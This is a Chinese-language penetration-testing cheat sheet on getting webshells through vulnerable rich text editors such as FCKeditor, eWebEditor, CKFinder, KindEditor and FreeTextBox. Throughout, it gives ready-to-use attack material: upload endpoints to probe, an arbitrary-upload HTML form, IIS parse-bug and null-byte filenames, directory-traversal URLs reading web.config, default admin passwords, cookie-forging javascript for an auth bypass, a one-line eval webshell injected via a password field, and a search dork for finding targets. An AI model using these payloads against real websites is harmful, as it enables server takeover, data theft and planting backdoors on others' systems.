文本编辑器漏洞
- 常见的文本编辑器有CKEditor、.Ewebeditor、UEditor、KindEditor、XHeditor等。这类编辑器的功能是非常类似的,比如都有图片上传、视频上传、远程下载等功能,这类文本编辑器也称为富文本编辑器
- 使用此类编辑器减少了程序开发的时间,但是却增加了许多安全隐患,比如:使用CKEditor编辑器有10万个树站,如果CKEditor爆出一个GetShell漏洞,那么这10万个网站都因此受到牵连。
下面以FCKeditor编辑器为例,讲述文本编辑器漏洞。FCK编辑器漏洞
FCKeditor是一个开放源代码、所见即所得的文字编辑器,可以适用于ASP/PHP/ASPX/JSP等脚本类型网站. - 注:FCKeditor现已改名为CKEditor。
FCKeditor编辑器页/查看编辑器版本/查看文件上传路径
FCKeditor编辑器页
1
FCKeditor/_samples/default.html
查看编辑器版本
1
FCKeditor/_whatsnew.html
查看文件上传路径
1
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
查找可利用的上传页面
查找方法:
- 手工收集上传地址,访问测试看是否能上传
- 利用编辑器对应利用工具查找上传页面
- 利用目录扫描工具进行探测查找
常见上传页面地址
1
2
3
4
5
6
7
8
9
10
11FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor/_samples/default.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
fckeditor/editor/filemanager/connectors/test.htmlasp常用上传页面地址
1
fckeditor//editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
1
fckeditor//editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
1
fckeditor//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
aspx常用上传地址
1
fckeditor//editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
1
fckeditor//editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx
1
fckeditor//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/aspx/connector.aspx
php常用上传地址
1 | fckeditor//editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ |
1 | fckeditor//editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/php/connector.php |
1 | fckeditor//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/php/connector.php |
1 | fckeditor//editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ |
1 | FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过) |
漏洞利用
- Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件
- FCKeditor v2.4.3中File类别默认拒绝上传类型:
1
2html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
- windows有任意文件上传漏洞如x.asp;.jpg
Apache+linux 环境下在上传文件后面加个.突破!测试通过。Version <=2.4.2 For php
在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。1
2
3
4
5<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>低于fck 2.5版本利用
看网站容器是否是IIS 6.0 ,利用解析漏洞
可以上传下 x.asa/cer/cdx 或者 x.jpg;.cer/x.jpg;asa
利用目录解析漏洞
创建一个x.asp 目录 上传图片马即可
利用00截断漏洞
x.asp%00jpg
FCKeditor 文件上传“.”变“_”下划线的绕过方法
- fckeditor 2.5 文件上传“.”变“_”下划线的绕过方法
- 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
- 突破方法:
- 二次上传
- a.asp%00.jpg 00截断利用
- 使用特殊名称绕过
a.aspx.a;.a.aspx.jpg..jpg.aspx
xx.asp.;.jpg - 递归创建a.asp目录配合解析漏洞
- FCKeditor_2.5/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp
fckeditor 2.6.3 php版本利用
上传页面地址
1 | FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php |
转包在url中00截断
FCK编辑器jsp版本漏洞:
1 | http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F |
上传马所在目录
1 | FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ |
上传shell的地址:
1 | http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector |
EWEB编辑器漏洞
eweb编辑器利用流程
- 查找eweb编辑器路径,找eweb管理后台
- 进入后台,修改上传文件类型
- 上传脚本拿shell
- 如果没有后台
- 看是否能下载数据库,看数据库中有没有可以上传脚本的样式,构造上传
- 利用eweb目录遍历漏洞,找到网站数据库,下载破解管理员密码进后台拿shell
- 查找对用编辑器版本漏洞利用拿shell
eWebEditor利用基础知识
- 默认后台地址:/ewebeditor/admin_login.asp
建议最好检测下admin_style.asp文件是否可以直接访问
默认数据库路径:[PATH]/db/ewebeditor.mdb
[PATH]/db/db.mdb – 某些CMS里是这个数据库
也可尝试 [PATH]/db/%23ewebeditor.mdb – 某些管理员自作聪明的小伎俩 - 使用默认密码:admin/admin888 或 admin/admin 进入后台,也可尝试 admin/123456 (有些管理员以及一些CMS,就是这么设置的)
有修改权限的利用
- 通过增加样式–设置-添加插入图片-getshell
- 不能添加工具栏,但设定好了某样式中的文件类型
- 修改action字段
- 比如 ID=46 s-name =standard1
通过目录遍历:
http://www.webshell.com/admin/editor/admin_uploadfile.asp?id=&dir=..
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了
eWebEditor 5.2 列目录漏洞
ewebeditor/asp/browse.asp
过滤不严,造成遍历目录漏洞
http://www.xxxx.com/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
利用WebEditor session欺骗漏洞,进入后台
eWebEditor 2.7.0 注入漏洞
http://www.xxxx.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用nbsi进行猜解.
eWebEditor2.8.0最终版删除任意文件漏洞
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入。
攻击利用: (请修改action字段为指定网址)
Del Files.html
eWebEditor PHP/ASP…后台通杀漏洞
影响版本: PHP ≥ 3.0~3.8与asp 2.8版也通用,或许低版本也可以,有待测试。
攻击利用:
进入后台/eWebEditor/admin/login.php,随便输入一个用户和密码,会提示出错了.
这时候你清空浏览器的url,然后输入
javascript:alert(document.cookie=”adminuser=”+escape(“admin”));
javascript:alert(document.cookie=”adminpass=”+escape(“admin”));
javascript:alert(document.cookie=”admindj=”+escape(“1”));
而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如../ewebeditor/admin/default.php,就会直接进去。
eWebEditor 2.8 商业版插一句话木马
登陆后台,点击修改密码—新密码设置为 1”:eval request(“h”)’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
eWebEditor
下载数据库
查看可以上传脚本类型的样式
然后进行构造上传
其他编辑器漏洞
CKFinder 任意文件上传漏洞
CKFinder是国外一款非常流行的所见即所得文字编辑器,其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件。CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传xxxx_php;1.jpg 等畸形文件名,最终导致文件上传漏洞。
- 然后修改文件名
- xxxx.php;1.jpg
- 利用iis6.0目录解析漏洞拿shell
- 创建目录/x.asp/
- 在目录下上传图片马即可拿shell
南方数据编辑器southidceditor
- 首先登陆后台
- 利用编辑器上传:
- 访问admin/southidceditor/admin_style.asp
- 修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
通过upfile_other.asp漏洞文件直接取SHELL
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用双文件上传
此方法通杀南方数据、良精系统、网软天下等
在Upfile_Photo.asp文件中
只限制了对”asp”,”asa”,”aspx”类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可
UEDITOR
利用II6.0文件名解析漏洞,上传图片改名为x.php;20160032342342.jpg获取shell
DotNetTextBox编辑器漏洞
- 关键字:system_dntb/
- 确定有 system_dntb/uploadimg.aspx 并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。
- cookie:UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/;
- 路径可以修改,只是权限够,上传后改名为1.asp;.jpg利用iis解析漏洞。
system_dntb/advanced.aspx
用firebug将disabled=”disabled’,value=”jgp,gif,png”修改为enabled=”enabled”,value=”jpg,gif,png,aspx”,然后点更新成功按钮
PHPWEB网站管理系统后台Kedit编辑器
两种利用方式
- 第一种是利用iis6.0文件名解析漏洞
xx.php;xx.jpg - 第二种方式
%00阶段
xx.php%00jpgCute Editor在线编辑器本地包含漏洞
影响版本:- CuteEditor For Net 6.4
- 脆弱描述:
- 可以随意查看网站文件内容,危害较大。
- 攻击利用:
http://www.xxxx.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
Cute Editor Asp.Net版利用iis解析漏洞获得权限
影响版本:
CuteEditor for ASP.NET中文版脆弱描述:
脆弱描述:
CuteEditor对上传文件名未重命名,导致其可利用IIS文件名解析Bug获得webshell权限。
攻击利用:
可通过在搜索引擎中键入关键字 inurl:Post.aspx?SmallClassID= 来找到测试目标。
在编辑器中点击“多媒体插入”,上传一个名为“xxx.asp;.avi”的网马,以此获得权限。
Webhtmleditor
利用WIN 2003 IIS文件名称解析漏洞获得SHELL
对上传的图片或其他文件无重命名操作,导致允许恶意用户上传diy.asp;.jpg来绕过对后缀名审查的限制,对于此类因编辑器作者意识犯下的错误,就算遭遇缩略图,文件头检测,也可使用图片木马 插入一句话来突破。
Kindeditor
利用WIN 2003 IIS文件名称解析漏洞获得SHELL
影响版本: <= kindeditor 3.2.1(09年8月份发布的最新版)
脆弱描述/攻击利用:
upload/2010/3/201003102334381513.jpg 大家可以前去围观。
xx.asp;x.jpg
##Freetextbox
Freetextbox遍历目录漏洞
影响版本:未知
脆弱描述:
因为ftb.imagegallery.aspx代码中 只过滤了/但是没有过滤\符号所以导致出现了遍历目录的问题。
攻击利用:
在编辑器页面点图片会弹出一个框(抓包得到此地址)构造如下,可遍历目录。
http://www.xxxx.com/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\..
Freetextbox Asp.Net版利用IIS解析漏洞获得权限
影响版本:所有版本
脆弱描述:
没做登陆验证可以直接访问上传木马
Freetextbox 3-3-1 可以直接上传任意格式的文件
Freetextbox 1.6.3 及其他版本可以上传 格式为x.asp;.jpg
攻击利用:
利用IIS解析漏洞拿SHELL。上传后SHELL的路径为http://xxxx.com/images/x.asp;.jpg
Msn editor利用iis6.0解析漏洞
影响版本:未知
脆弱描述:
点击图片上传后会出现上传页面,地址为
http://navisec.it/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=
用普通的图片上传后,地址为
http://navisec.it/news/uppic/41513102009204012_1.gif
记住这时候的路径,再点击图片的上传,这时候地址就变成了
http://navisec.it/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012
很明显。图片的地址是根据RemNum后面的编号生成的。
攻击利用:
配合IIS的解析漏洞,把RemNum后面的数据修改为1.asp;41513102009204012,变成下面这个地址
http://navisec.it/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012
然后在浏览器里打开,然后选择你的脚本木马上传,将会返回下面的地址
uppic/1.asp;41513102009204012_2.gif
直接打开就是我们的小马地址!
附录